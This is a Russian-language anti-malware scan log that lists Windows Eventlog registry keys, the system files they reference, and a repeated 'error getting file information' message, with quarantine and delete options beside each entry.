Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\Application\Microsoft-Windows-SpellChecker, EventMessageFile
C:\Windows\System32\profsvc.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\Application\Microsoft-Windows-User Profiles Service, EventMessageFile
C:\Windows\system32\WINSAT.EXE
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\Application\Microsoft-Windows-WindowsSystemAssessmentTool, EventMessageFile
C:\Windows\system32\winsrv.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\Application\Microsoft-Windows-Winsrv, EventMessageFile
C:\Windows\System32\profsvc.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\Application\Profsvc, EventMessageFile
C:\Windows\System32\wscsvc.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\Application\SecurityCenter, EventMessageFile
C:\Windows\system32\sppsvc.exe
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\Application\Software Protection Platform Service, EventMessageFile
C:\Windows\system32\srcore.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\Application\System Restore, EventMessageFile
C:\Windows\System32\VSSVC.EXE
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\Application\VSS, EventMessageFile
C:\Windows\System32\wersvc.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\Application\WerSvc, EventMessageFile
C:\Windows\system32\Wat\WatUX.exe
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\Application\Windows Activation Technologies, EventMessageFile
C:\Windows\system32\sdengin2.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\Application\Windows Backup, EventMessageFile
C:\Windows\system32\wsepno.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\Application\Windows Search Service Profile Notification, EventMessageFile
C:\ProgramData\WindowsMangerPro
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\Application\WindowsMangerProtect, EventMessageFile
C:\Windows\System32\winlogon.exe
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\Application\Winlogon, EventMessageFile
C:\Windows\System32\winlogon.exe
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\Application\Wlclntfy, EventMessageFile
C:\Windows\system32\wecsvc.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\HardwareEvents, DisplayNameFile
C:\Windows\system32\sppsvc.exe
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\Key Management Service\KmsRequests, EventMessageFile
C:\Windows\System32\wevtsvc.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\Security\Microsoft-Windows-Eventlog, EventMessageFile
C:\Windows\System32\VSSVC.EXE
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\Security\VSSAudit, EventMessageFile
C:\Windows\System32\Drivers\acpi.sys
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\ACPI, EventMessageFile
C:\Windows\System32\aelupsvc.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\AeLookupSvc, EventMessageFile
C:\Windows\System32\drivers\amdk8.sys
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\AmdK8, EventMessageFile
C:\Windows\System32\drivers\ati2erec.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\amdkmdag, EventMessageFile
C:\Windows\System32\drivers\ati2erec.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\amdkmdap, EventMessageFile
C:\Windows\System32\drivers\amdppm.sys
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\AmdPPM, EventMessageFile
C:\Windows\System32\drivers\bxvbda.sys
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\b06bdrv, EventMessageFile
C:\Windows\System32\drivers\b57nd60a.sys
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\b57nd60a, EventMessageFile
C:\Windows\System32\DispCI.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\Display, EventMessageFile
C:\Windows\System32\dmvscres.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\dmvsc, EventMessageFile
C:\Windows\System32\drivers\evbda.sys
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\ebdrv, EventMessageFile
C:\Windows\System32\drivers\fltmgr.sys
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\FltMgr, EventMessageFile
C:\Windows\System32\Drivers\hidbth.sys
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\HidBth, EventMessageFile
C:\Windows\System32\drivers\i8042prt.sys
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\i8042prt, EventMessageFile
C:\Windows\System32\drivers\iaStorV.sys
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\iaStorV, EventMessageFile
C:\Windows\System32\drivers\intelppm.sys
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\intelppm, EventMessageFile
C:\Windows\System32\drivers\ipmidrv.sys
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\IPMIDRV, EventMessageFile
C:\Windows\System32\drivers\isapnp.sys
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\isapnp, EventMessageFile
C:\Windows\System32\iscsilog.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\iScsiPrt, EventMessageFile
C:\Windows\System32\drivers\kbdclass.sys
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\kbdclass, EventMessageFile
C:\Windows\System32\drivers\kbdhid.sys
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\kbdhid, EventMessageFile
C:\Windows\System32\Drivers\L1C62x64.sys
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\L1C, EventMessageFile
C:\Windows\System32\lsasrv.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\LsaSrv, EventMessageFile
C:\Windows\system32\lsm.exe
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\LSM, EventMessageFile
C:\Windows\system32\fveapi.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\Microsoft-Windows-BitLocker-API, EventMessageFile
C:\Windows\system32\drivers\fvevol.sys
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\Microsoft-Windows-BitLocker-Driver, EventMessageFile
C:\Windows\system32\qmgr.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\Microsoft-Windows-Bits-Client, EventMessageFile
C:\Windows\system32\cofiredm.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\Microsoft-Windows-CorruptedFileRecovery-Client, EventMessageFile
C:\Windows\system32\cofiredm.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\Microsoft-Windows-CorruptedFileRecovery-Server, EventMessageFile
C:\Windows\System32\samsrv.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\Microsoft-Windows-Directory-Services-SAM, EventMessageFile
C:\Windows\system32\dfdts.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\Microsoft-Windows-DiskDiagnostic, EventMessageFile
C:\Windows\system32\WUDFPlatform.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\Microsoft-Windows-DriverFrameworks-UserMode, EventMessageFile
C:\Windows\system32\wecsvc.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\Microsoft-Windows-EventCollector, EventMessageFile
C:\Windows\System32\wevtsvc.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\Microsoft-Windows-Eventlog, EventMessageFile
C:\Windows\system32\drivers\fltmgr.sys
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\Microsoft-Windows-FilterManager, EventMessageFile
C:\Windows\system32\mpssvc.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\Microsoft-Windows-Firewall, EventMessageFile
C:\Windows\system32\fdphost.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\Microsoft-Windows-FunctionDiscoveryHost, EventMessageFile
C:\Windows\system32\gpsvc.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\Microsoft-Windows-GroupPolicy, EventMessageFile
C:\Windows\system32\microsoft-windows-hal-events.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\Microsoft-Windows-HAL, EventMessageFile
C:\Windows\system32\drivers\HTTP.SYS
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\Microsoft-Windows-HttpEvent, EventMessageFile
C:\Windows\system32\ipbusenum.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\Microsoft-Windows-IPBusEnum, EventMessageFile
C:\Windows\system32\iphlpsvc.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\Microsoft-Windows-Iphlpsvc, EventMessageFile
C:\Windows\system32\microsoft-windows-kernel-power-events.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\Microsoft-Windows-Kernel-Power, EventMessageFile
C:\Windows\system32\microsoft-windows-kernel-processor-power-events.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\Microsoft-Windows-Kernel-Processor-Power, EventMessageFile
C:\Windows\system32\lpksetup.exe
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\Microsoft-Windows-LanguagePackSetup, EventMessageFile
C:\Windows\System32\relpost.exe
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\Microsoft-Windows-MemoryDiagnostics-Results, EventMessageFile
C:\Windows\System32\mdsched.exe
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\Microsoft-Windows-MemoryDiagnostics-Schedule, EventMessageFile
C:\Windows\system32\cscsvc.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\Microsoft-Windows-OfflineFiles, EventMessageFile
C:\Windows\System32\sstpsvc.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\Microsoft-Windows-RasSstp, EventMessageFile
C:\Windows\system32\recovery.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\Microsoft-Windows-Recovery, EventMessageFile
C:\Windows\system32\fdrespub.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\Microsoft-Windows-ResourcePublication, EventMessageFile
C:\Windows\system32\certprop.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\Microsoft-Windows-SCPNP, EventMessageFile
C:\Windows\system32\oobe\winsetup.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\Microsoft-Windows-Setup, EventMessageFile
C:\Windows\System32\MsSpellCheckingFacility.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\Microsoft-Windows-Spell-Checking, EventMessageFile
C:\Windows\System32\MsSpellCheckingFacility.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\Microsoft-Windows-SpellChecker, EventMessageFile
C:\Windows\system32\csrsrv.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\Microsoft-Windows-Subsys-SMSS, EventMessageFile
C:\Windows\system32\schedsvc.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\Microsoft-Windows-TaskScheduler, EventMessageFile
C:\Windows\system32\tbssvc.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\Microsoft-Windows-TBS, EventMessageFile
C:\Windows\system32\lsm.exe
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\Microsoft-Windows-TerminalServices-LocalSessionManager, EventMessageFile
C:\Windows\system32\termsrv.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\Microsoft-Windows-TerminalServices-RemoteConnectionManager, EventMessageFile
C:\Windows\system32\w32time.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\Microsoft-Windows-Time-Service, EventMessageFile
C:\Windows\system32\umpnpmgr.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\Microsoft-Windows-UserPnp, EventMessageFile
C:\Windows\system32\wuaueng.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\Microsoft-Windows-WindowsUpdateClient, EventMessageFile
C:\Windows\system32\winlogon.exe
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\Microsoft-Windows-Winlogon, EventMessageFile
C:\Windows\system32\wlansvc.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\Microsoft-Windows-WLAN-AutoConfig, EventMessageFile
C:\Windows\System32\drivers\mouclass.sys
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\mouclass, EventMessageFile
C:\Windows\System32\drivers\mouhid.sys
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\mouhid, EventMessageFile
C:\Windows\System32\drivers\mpio.sys
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\mpio, EventMessageFile
C:\Windows\System32\iscsiexe.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\MSiSCSI, EventMessageFile
C:\Windows\System32\drivers\MTConfig.sys
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\MTConfig, EventMessageFile
C:\Windows\system32\drivers\ntfs.sys
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\Ntfs, EventMessageFile
C:\Windows\System32\drivers\nvstor.sys
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\nvstor, EventMessageFile
C:\Windows\System32\drivers\parport.sys
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\Parport, EventMessageFile
C:\Windows\System32\Drivers\Pcmcia.sys
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\pcmcia, EventMessageFile
C:\Windows\System32\umpnpmgr.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\PlugPlayManager, EventMessageFile
C:\Windows\System32\umpo.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\Power, EventMessageFile
C:\Windows\System32\drivers\processr.sys
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\Processor, EventMessageFile
C:\Windows\system32\sstpsvc.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\RasSstp, EventMessageFile
C:\Windows\System32\samsrv.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\SAM, EventMessageFile
C:\Windows\System32\drivers\sbp2port.sys
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\sbp2port, EventMessageFile
C:\Windows\System32\lsasrv.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\Schannel, EventMessageFile
C:\Windows\System32\drivers\serial.sys
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\Serial, EventMessageFile
C:\Windows\System32\drivers\sermouse.sys
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\sermouse, EventMessageFile
C:\Windows\system32\services.exe
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\Service Control Manager, EventMessageFile
C:\Windows\System32\snmptrap.exe
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\SNMPTRAP, EventMessageFile
C:\Windows\System32\wiaservc.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\StillImage, EventMessageFile
C:\Windows\System32\vmstorfltres.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\storflt, EventMessageFile
C:\Windows\System32\tcpmon.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\TCPMon, EventMessageFile
C:\Windows\system32\termsrv.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\TermService, EventMessageFile
C:\Windows\System32\drivers\tsusbflt.sys
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\TsUsbFlt, EventMessageFile
C:\Windows\System32\umrdp.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\UmRdpService, EventMessageFile
C:\Windows\System32\drivers\vgapnp.sys
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\vga, EventMessageFile
C:\Windows\System32\vds.exe
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\Virtual Disk Service, EventMessageFile
C:\Windows\System32\vmbusres.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\vmbus, EventMessageFile
C:\Windows\System32\Drivers\VolSnap.sys
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\Volsnap, EventMessageFile
C:\Windows\system32\w32time.dll
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
--Ключ реестраHKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\W32Time, EventMessageFile
C:\Windows\System32\drivers\wacompen.sys
ошибка получения информации о файле
Скрипт: Kарантин, Удалить, Удалить через BC
